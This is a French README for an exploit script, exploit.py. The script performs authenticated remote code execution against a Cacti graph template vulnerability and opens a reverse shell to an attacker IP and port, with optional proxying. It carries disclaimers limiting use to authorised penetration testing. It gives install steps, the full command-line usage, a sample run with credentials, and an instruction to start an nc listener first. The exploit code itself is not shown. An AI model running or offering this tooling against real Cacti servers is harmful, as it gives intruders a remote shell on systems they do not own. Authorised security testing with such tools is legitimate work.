
Exploit d'exécution de code à distance authentifiée pour la vulnérabilité du modèle de graphique Cacti, avec payload de shell inversé et prise en charge du proxy pour les tests d'intrusion autorisés.
Important — Lisez ceci en premier :
Ce dépôt etexploit.pysont fournis uniquement à des fins éducatives et de recherche. N'utilisez pas ce code contre des systèmes, réseaux ou services pour lesquels vous ne possédez pas une autorisation explicite et écrite. L'accès non autorisé aux systèmes informatiques est illégal et contraire à l'éthique. En utilisant ce code, vous acceptez de respecter les lois applicables et les politiques institutionnelles.
python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4
python3 exploit.py -u <username> -p <password> -i <attacker_ip> -l <listener_port> -url <target_url> [--proxy]
Avant d'exécuter le script, assurez-vous d'avoir un listener nc en cours d'exécution. Exécutez le script sans proxy sauf pour le débogage :
python3 exploit.py \
-u testuser \
-p Welcome1 \
-i 192.168.43.11 \
-l 4444 \
-url http://localhost
Rappel final : Ce script et ce README sont uniquement à des fins éducatives. N'utilisez jamais ces outils pour accéder illégalement à des systèmes.